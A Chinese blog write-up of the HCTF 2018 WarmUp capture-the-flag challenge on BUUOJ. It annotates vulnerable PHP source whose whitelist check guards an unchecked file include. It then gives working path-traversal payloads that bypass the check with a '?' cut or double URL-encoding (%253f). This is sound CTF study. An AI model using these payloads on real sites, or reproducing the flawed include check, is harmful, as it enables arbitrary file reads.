本文详细解析了HCTF2018 WarmUp题目,通过PHP代码审计找到flag所在,利用文件包含漏洞及URL构造技巧成功获取到flag。
从今天开始每天做一道buu上的web题,写博客是为了记下来防止自己以后忘了和督促自己。(不知道哪天能全部做完)
[HCTF 2018]WarmUp
从提示来看这是一道php代码审计题,其实我php只学了一点皮毛,只能摸着石头过河了。网页点开是一张滑稽的图片,右键查看源代码没有什么玄机,估计flag是藏在source.php里。(<!--source.php-->是注释该文件的意思。)
在有滑稽的网页的URL后添加/source.php查看代码
<?php
highlight_file(__FILE__);
class emmm
{
public static function checkFile(&$page)
{
$whitelist = ["source"=>"source.php","hint"=>"hint.php"]; #申明白名单
if (! isset($page) || !is_string($page)) { #判断page变量是否存在并且是否是字符串
echo "you can't see it";
return false;
}
if (in_array($page, $whitelist)) { #in_array函数在第二个参数(数组)里找第一个参数是否存在
return true;
}
$_page = mb_substr( #mb_substr从字符串中提取子串,第一个参数是被提取的字符串,第二个参数是开始位置,第三个参数是提取字符串的长度
$page,
0,
mb_strpos($page . '?', '?') mb_strpos查找后一个字符串在第一个字符串首次出现的位置
); #这个步骤就是截取page中第一个?前的内容
if (in_array($_page, $whitelist)) {
return true;
}
$_page = urldecode($page); #urldecode函数是把经过urlencode的字符串转换回来
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
echo "you can't see it";
return false;
}
} #checkfile函数要求参数以某种形式(三种可选)包含白名单里的内容
if (! empty($_REQUEST['file'])
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'])
) {
include $_REQUEST['file']; #这里有一个文件包含漏洞
exit;
} else {
echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
?>
白名单里有一个hint.php文件,先尝试包含该文件,在原链接后加上?file=hint.php,显示flag not here, and flag in ffffllllaaaagggg。要相信用滑稽图片的都不是坏人,这应该就是正确提示。那么我们就要绕过emmm::checkFile($_REQUEST['file']),让它返回true。最简单的就是用它的?截断机制,构造URL后缀为?file=source.php?../../../ffffllllaaaagggg,这里的…/数量不确定,可以多试几次。最后成功的URL是http://a2df1a09-e1e2-46d4-a468-b95cf4459445.node3.buuoj.cn/?file=source.php?../../../../../ffffllllaaaagggg。
也可以构造URL是http://1c797915-11af-459e-9a50-955b3dc3216b.node3.buuoj.cn/?file=source.php%253f../../../../../ffffllllaaaagggg,本身浏览器会做一次解码,checkfile函数又做了一次解码,%253f两次解码以后就是?
提交flag的时候要连flag{}一起提交,第一次做不知道啊(扶额
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
